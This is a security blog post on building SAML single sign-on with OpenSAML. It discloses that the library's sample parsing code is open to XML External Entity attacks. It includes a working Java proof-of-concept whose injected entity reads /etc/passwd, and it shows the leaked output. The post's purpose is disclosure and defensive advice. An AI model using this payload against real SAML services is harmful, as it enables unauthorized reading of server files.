Web-based Single Sign-On and the Dangers of SAML XML Parsing

Security Assertion Markup Language (SAML) is a popular XML-based open standard for exchanging authentication and authorization data between two systems. In the world of enterprise cloud applications, SAML is one of the most common protocols for implementing single sign-on between enterprise customers and cloud service providers. Given that, it’s no surprise that support for SAML-based Single Sign-on was one of the earliest requested features that our enterprise customers asked for.

A typical web-based single sign-on transaction (or web SSO for short) involves three parties: the service provider, the identity provider, and a user agent (the user). In our world, we (SendSafely) are the service provider, our enterprise customers would be the identity provider, and our end-users would be the user agent. At a high-level, the sign-on transaction looks something like the following diagram:

As you can see, while the exchange is not overly complex, there are several steps with XML based messages handled by the identity provider and service provider. One thing we noticed off the bat when planning to implement the service provider end of the workflow was that publicly available documentation for building a custom implementation is scarce. There is no shortage of 3rd party solutions, but at SendSafely we are always hesitant to add unnecessary external dependencies to our code base due to the vulnerabilities they could introduce into our platform. This hesitation is especially high when it comes to anything authentication related. Rather than go with an off-the-shelf solution, we opted to instead leverage the OpenSAML library and implement the service provider ourselves so that we know what is happening under the hood.

OpenSAML Sample Code

Having decided to go with OpenSAML, the first thing we did was consult the official website to obtain the latest version of the library and review the available documentation. As with most well documented platforms, the documentation also included some basic code examples on how to use the library to consume and generate SAML.

In order to accept and process SAML responses from our customers, we essentially need to parse an XML request from the user agent (sent by the identity provider) and validate the SAML contents. The following documentation and sample code is published on the OpenSAML website, and shows how to convert XML retrieved from the authentication response to an expected SAML object.

https://wiki.shibboleth.net/confluence/display/OpenSAML/OSTwoUsrManJavaCreateFromXML

It’s worth pointing out that I wear two hats on most days: that of a developer and architect at SendSafely, and a professional penetration tester at Gotham Digital Science. One thing that my pen testing experience has taught me is that any code responsible for parsing XML is a prime target for an XML External Entity (XXE) vulnerability. For those unfamiliar with XXE vulnerabilities, they often allow a malicious user to read arbitrary files and open arbitrary TCP connection from the vulnerable server and can also be used to launch Denial of Service attacks. In short, lots of bad stuff can happen. Unfortunately, the code example from the OpenSAML website just so happens to be vulnerable to this attack.

To confirm this, we whipped up the following test code and our suspicions were validated. The test code exploits the fact that external entity calls are allowed and will load the “/etc/passwd” file from the server and return its content to the malicious user. Houston, we have a problem.

Code:

try { String evilString = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"+”<!DOCTYPE doc [ <!ENTITY x3 SYSTEM \"file:///etc/passwd\"> ] >"; String XMLString = "<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"aaf23196-1773-2113-474a-fe114412ab72\" Version=\"2.0\" IssueInstant=\"2004-12-05T09:21:59\" AssertionConsumerServiceIndex=\"0\" AttributeConsumingServiceIndex=\"0\"><saml:Issuer>&x3;</saml:Issuer><samlp:NameIDPolicy AllowCreate=\"true\" Format=\"urn:oasis:names:tc:SAML:2.0:nameid-format:transient\"/></samlp:AuthnRequest>"; XMLString = evilString + XMLString; DefaultBootstrap.bootstrap(); // Get parser pool manager BasicParserPool ppMgr = new BasicParserPool(); ppMgr.setNamespaceAware(true); // Parse metadata file InputStream in = new ByteArrayInputStream(XMLString.getBytes("UTF-8")); Document inCommonMDDoc = ppMgr.parse(in); Element metadataRoot = inCommonMDDoc.getDocumentElement(); // Get appropriate unmarshaller UnmarshallerFactory unmarshallerFactory = Configuration.getUnmarshallerFactory(); Unmarshaller unmarshaller = unmarshallerFactory.getUnmarshaller(metadataRoot); // Unmarshall using the document root element, an EntitiesDescriptor in this case AuthnRequestImpl inCommonMD = (AuthnRequestImpl) unmarshaller.unmarshall(metadataRoot); System.out.println("Winning: "+ inCommonMD.getIssuer().getValue()); } catch(Exception e) { e.printStackTrace(); }

Output:

Winning:## # User Database # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false

The fact that the OpenSAML library allows a developer to handle the XML parsing of the SAML XML data before it is passed to the “Unmarshaller” object is a bad design decision, and as you can see here it can result in the potential for many custom SSO or other SAML based solutions to be susceptible to XXE. Unfortunately we see this issue quite a bit at GDS, not only within SAML but any application which handles XML data from untrusted sources.

We have notified the OpenSAML team about the vulnerable sample code and the XXE flaw within the BasicParserPool XML parsing logic that is accompanied with the OpenSAML library. Developers and security professionals should be aware that this issue may exist across the internet within other open source solutions, off the shelf software or even your organization custom implementation of SAML parsing code.

Morals of the Story

One could say there are a couple morals to this story. The most important moral is never assume that sample code is good code. Yes, the code will likely do what its supposed to, but it may also do much more (and not stuff you want it to do). You should always carefully review any sample code retrieved from the web, especially if it directly handles user input. This can also be said about any off the shelf or open source solution.

Another important takeaway is that SAML, at the end of the day, is simply XML data and therefore you must include XML specific risks like XXE, Entity Expansion Attacks and even potential injection flaws when doing a threat model.